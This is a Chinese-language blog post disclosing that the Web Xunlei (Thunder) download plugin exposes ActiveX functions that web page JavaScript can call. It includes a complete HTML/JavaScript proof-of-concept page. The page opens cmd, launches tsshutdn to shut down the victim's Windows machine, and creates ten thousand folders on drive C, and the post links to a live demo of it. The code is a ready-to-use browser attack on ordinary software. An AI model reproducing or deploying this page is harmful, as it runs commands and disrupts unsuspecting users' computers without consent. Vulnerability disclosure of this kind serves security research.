by kxlzx
这篇文章很早前发出来,后来因为种种原因和谐了,现在过了这个长时间了。
最近乌云居然有人把某个东西搞了出来,“内部交流”果然不靠谱啊。
所以只好再次把某个东西搞出来,但是没想到某个东西居然依赖这篇文章,所以索性都扔出来吧。
描述:
web迅雷空间提供了几个函数,可以在js中直接调用,有些比较有意思的作用,比如
server.OpenDirectory("cmd");
server.CreatePathTree("c:\\hacked by kxlzx");
不是溢出,是迅雷自己提供的函数。
帮他们广告下:
没装迅雷的请到这里
http://dl.xunlei.com/wxl.html
下载安装。
demo地址:
http://inbreak.net/kxlzxtest/xunlei/kxlzx1.htm
录像地址:
http://inbreak.net/kxlzxtest/xunlei/xunlei.zip
代码:
- <html>
- <head>
- <title>迅雷执行任意系统命令</title>
- </head>
- <body>
- 运行迅雷加载项。
- <script>
- /**
- *by kxlzx
- */
- server = new ActiveXObject("ThunderServer.WebThunder.1");
- if(server==null)
- {
- alert("没装迅雷,请安装web迅雷");
- window.location.href="http://dl.xunlei.com/wxl.html";
- }else{
- server.OpenDirectory("cmd");
- alert("要我帮你关机么?");
- alert("哎呀呀!悲剧啊!你怎么不小心点了确定了?");
- server.OpenDirectory("tsshutdn");
- //创建无数文件夹
- j = 10000;
- for(i=0;i<j;i++){
- server.CreatePathTree("c:\\hacked by kxlzx "+i);
- }
- setTimeout("alert('还愣着?赶快保存啊!')",50000);
- }
- </script>
- </body>
- </html>
嗯。。。没看完文章先看demo的人后果自负。。。
打开页面后,先弹cmd黑框吓唬一下。
之后在c盘创建1W个文件夹。
j = 10000;
for(i=0;i<j;i++){打开的人后果自负}
在进行了友情提示后,逐渐关机-_-!
windows7下需要先打开web迅雷页面,之后再访问。原因查找中。。。感谢cnben友情测试。
XP下可安装web迅雷后,直接打开。
0 条评论。